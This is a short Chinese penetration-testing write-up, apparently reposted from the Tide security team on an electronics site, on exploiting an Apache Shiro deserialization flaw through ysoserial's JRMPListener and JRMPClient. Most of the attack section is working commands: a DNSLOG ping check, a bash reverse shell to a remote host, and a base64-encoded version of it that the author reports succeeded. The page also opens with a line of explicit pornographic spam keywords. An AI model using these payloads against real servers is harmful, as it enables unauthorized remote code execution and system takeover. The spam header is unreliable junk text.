chinese直男口爆体育生外卖, 99久久er热在这里只有精品99, 又色又爽又黄18禁美女裸身无遮挡, gogogo高清免费观看日本电视,私密按摩师高清版在线,人妻视频毛茸茸,91论坛 兴趣闲谈,欧美 亚洲 精品 8区,国产精品久久久久精品免费

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

使用JRMPClient模塊進行測試

jf_vLt34KHi ? 來源:Tide安全團隊 ? 作者:Tide安全團隊 ? 2022-11-22 17:22 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

前言

最近在測試中遇到一些shiro反序列化不能利用的情況 找到key 無法找到利用鏈,但是發(fā)現(xiàn)存在JRMPClient可用的情況。

b2047198-6a45-11ed-8abf-dac502259ad0.png

換一種工具嘗試

b225dc20-6a45-11ed-8abf-dac502259ad0.png

發(fā)現(xiàn) JRMPClient 可用, 嘗試使用 JRMPClient 進行測試,最終這個目標也沒有執(zhí)行成功所以換了一個目標進行的嘗試,僅記錄JRMPClient 利用方式。

使用JRMPClient模塊進行測試

找到一個同樣存在shiro反序列的目標。

b237b030-6a45-11ed-8abf-dac502259ad0.png

同樣find: JRMPClient can be use。

搭建JRMPClient 監(jiān)聽服務(wù)

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服務(wù),下載地址:https://github.com/frohoff/ysoserial

使用DNSLOG進行檢測

在不確定目標是否通外網(wǎng)的情況下 先使用DNSLOG進行檢測 獲取一個新的域名 :w3dh1h.dnslog.cn

b24883f6-6a45-11ed-8abf-dac502259ad0.png

VPS上開啟JRMPListener

在VPS上搭建服務(wù)命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

b2716df2-6a45-11ed-8abf-dac502259ad0.png

shiro反序列利用工具中選擇JRMPClient,然后輸入VPS上搭建服務(wù)的地址:

b2887efc-6a45-11ed-8abf-dac502259ad0.png

JRMPListener 收到返回信息

b29c67e6-6a45-11ed-8abf-dac502259ad0.png

DNSLOG上收到目標的ping 命令信息 說明目標服務(wù)器通外網(wǎng)

b2b75fce-6a45-11ed-8abf-dac502259ad0.png

執(zhí)行反彈命令

執(zhí)行反彈命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

b6ba1166-6a45-11ed-8abf-dac502259ad0.png

沒有收到反彈鏈接

b6db2266-6a45-11ed-8abf-dac502259ad0.png

將命令進行base64編碼 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

b6f38aae-6a45-11ed-8abf-dac502259ad0.png

成功收到反彈鏈接

b72e021a-6a45-11ed-8abf-dac502259ad0.png

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 模塊
    +關(guān)注

    關(guān)注

    7

    文章

    2788

    瀏覽量

    50398
  • key
    key
    +關(guān)注

    關(guān)注

    0

    文章

    53

    瀏覽量

    13089

原文標題:使用JRMPClient模塊進行測試

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關(guān)推薦
    熱點推薦

    怎樣對電源模塊進行可靠性測試

    電源作為電路系統(tǒng)的“心臟”,其重要性是顯而易見的。在選擇電源模塊時,除了要考慮輸入電壓范圍、額定功率、隔離耐壓、效率、紋波&噪聲等性能特性外,還需針對其高低溫性能和降額設(shè)計進行可靠性測試。
    的頭像 發(fā)表于 09-25 11:31 ?2w次閱讀
    怎樣對電源<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>可靠性<b class='flag-5'>測試</b>

    電源模塊生產(chǎn)測試必備系統(tǒng)

    n 系統(tǒng)簡介 電源模塊作為電路系統(tǒng)的心臟,它的性能直接影響到整個電路系統(tǒng)的正常運行,因此電源模塊的產(chǎn)品性能就顯得格外重要,對于一款合格的電源模塊,需要進行多項性能參數(shù)的
    發(fā)表于 11-21 17:00 ?1979次閱讀
    電源<b class='flag-5'>模塊</b>生產(chǎn)<b class='flag-5'>測試</b>必備系統(tǒng)

    對光模塊進行測試的四大步驟

    模塊是由發(fā)射器和接收器組成。當發(fā)射器通過光纖與接收器連接時,如果整個系統(tǒng)的誤碼率沒有達到預(yù)期的效果,是發(fā)射器的問題還是接收器的問題?測試模塊一般分為4個步驟,主要分為對發(fā)射器和接收器的測試
    的頭像 發(fā)表于 12-25 16:27 ?3437次閱讀

    使用示波器對電源模塊進行紋波測量

      在電源模塊物料檢測和某些單板測試時,會使用示波器對電源模塊進行紋波測量,所以需要了解電源紋波的產(chǎn)生、危害,以及示波器各種探頭,用哪種探頭測試
    的頭像 發(fā)表于 01-12 16:35 ?9450次閱讀
    使用示波器對電源<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>紋波測量

    使用TPT進行測試建模/測試設(shè)計

    TPT中的測試用例用信號特征和函數(shù)調(diào)用描述被測系統(tǒng)的刺激。您可以用連續(xù)的測試步驟對簡單的測試進行建模。對于更復(fù)雜的測試用例,TPT提供了混合
    的頭像 發(fā)表于 11-25 11:15 ?1420次閱讀
    使用TPT<b class='flag-5'>進行</b><b class='flag-5'>測試</b>建模/<b class='flag-5'>測試</b>設(shè)計

    聚焦千兆光模塊和萬兆光模塊測試技術(shù)及設(shè)備

    本文主要探討了千兆光模塊和萬兆光模塊測試技術(shù)及測試設(shè)備,讓讀者了解光模塊測試的具體方法。同時,
    的頭像 發(fā)表于 11-06 15:00 ?1127次閱讀

    電源自動測試系統(tǒng)如何進行電源模塊測試

    電源自動測試系統(tǒng)如何進行電源模塊測試? 電源自動測試系統(tǒng)是用于對電源模塊
    的頭像 發(fā)表于 11-09 09:30 ?1382次閱讀

    電源模塊耐壓測試的標準及其規(guī)范是什么?要如何測試?

    電源模塊耐壓測試的標準及其規(guī)范是什么?要如何測試? 電源模塊是電子設(shè)備中至關(guān)重要的部分,其耐壓測試是確保產(chǎn)品質(zhì)量和安全性的重要環(huán)節(jié)。在
    的頭像 發(fā)表于 11-10 14:22 ?5708次閱讀

    電源模塊測試如何對電源紋波測試進行助力?

    直流電源紋波是什么?直流電源紋波的危害?電源模塊測試如何對電源紋波測試進行助力? 直流電源紋波是指直流電源輸出的電壓或電流在時間上的波動。通常情況下,直流電源的輸出不應(yīng)該有波動,而應(yīng)該
    的頭像 發(fā)表于 11-10 15:33 ?801次閱讀

    利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試說明

    電子發(fā)燒友網(wǎng)站提供《利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試說明.pdf》資料免費下載
    發(fā)表于 11-22 10:13 ?3次下載
    利用ADPD188BI光學煙霧和氣霧劑檢測<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>煙霧<b class='flag-5'>測試</b>說明

    利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試

    電子發(fā)燒友網(wǎng)站提供《利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試.pdf》資料免費下載
    發(fā)表于 11-23 10:36 ?3次下載
    利用ADPD188BI光學煙霧和氣霧劑檢測<b class='flag-5'>模塊</b>來<b class='flag-5'>進行</b>煙霧<b class='flag-5'>測試</b>

    為什么要進行模塊測試?光模塊測試方案

    為什么要進行模塊測試?光模塊測試方案 光模塊測試
    的頭像 發(fā)表于 01-19 11:15 ?2330次閱讀

    如何測試模塊的性能?需要哪些測試測量設(shè)備?

    模塊是一種將電信號轉(zhuǎn)換為光信號或?qū)⒐庑盘栟D(zhuǎn)換為電信號的設(shè)備,它在光通信系統(tǒng)中起著重要的作用。為了保證光模塊的正常工作,我們需要對其進行性能測試,檢測其是否符合相關(guān)的標準和規(guī)范。那么,
    的頭像 發(fā)表于 01-30 09:03 ?8371次閱讀
    如何<b class='flag-5'>測試</b>光<b class='flag-5'>模塊</b>的性能?需要哪些<b class='flag-5'>測試</b>測量設(shè)備?

    什么是光模塊中的浪涌測試?

    ,光模塊常常會遭受到來自外部環(huán)境的各種干擾,其中包括來自電力系統(tǒng)的浪涌電壓。因此,進行模塊浪涌測試對于確保其穩(wěn)定性和可靠性至關(guān)重要。 浪涌測試
    的頭像 發(fā)表于 01-31 14:24 ?1297次閱讀

    電源模塊測試系統(tǒng)精準測量:揭秘納米軟件的測試技術(shù)

    電源測試系統(tǒng)是針對精密電源、開關(guān)電源、工業(yè)電源、軍品電源等多種電源模塊特性測試的ate自動化測試設(shè)備,旨在綜合檢測電源模塊性能,判斷電源是否
    的頭像 發(fā)表于 09-05 18:47 ?633次閱讀
    電源<b class='flag-5'>模塊</b><b class='flag-5'>測試</b>系統(tǒng)精準測量:揭秘納米軟件的<b class='flag-5'>測試</b>技術(shù)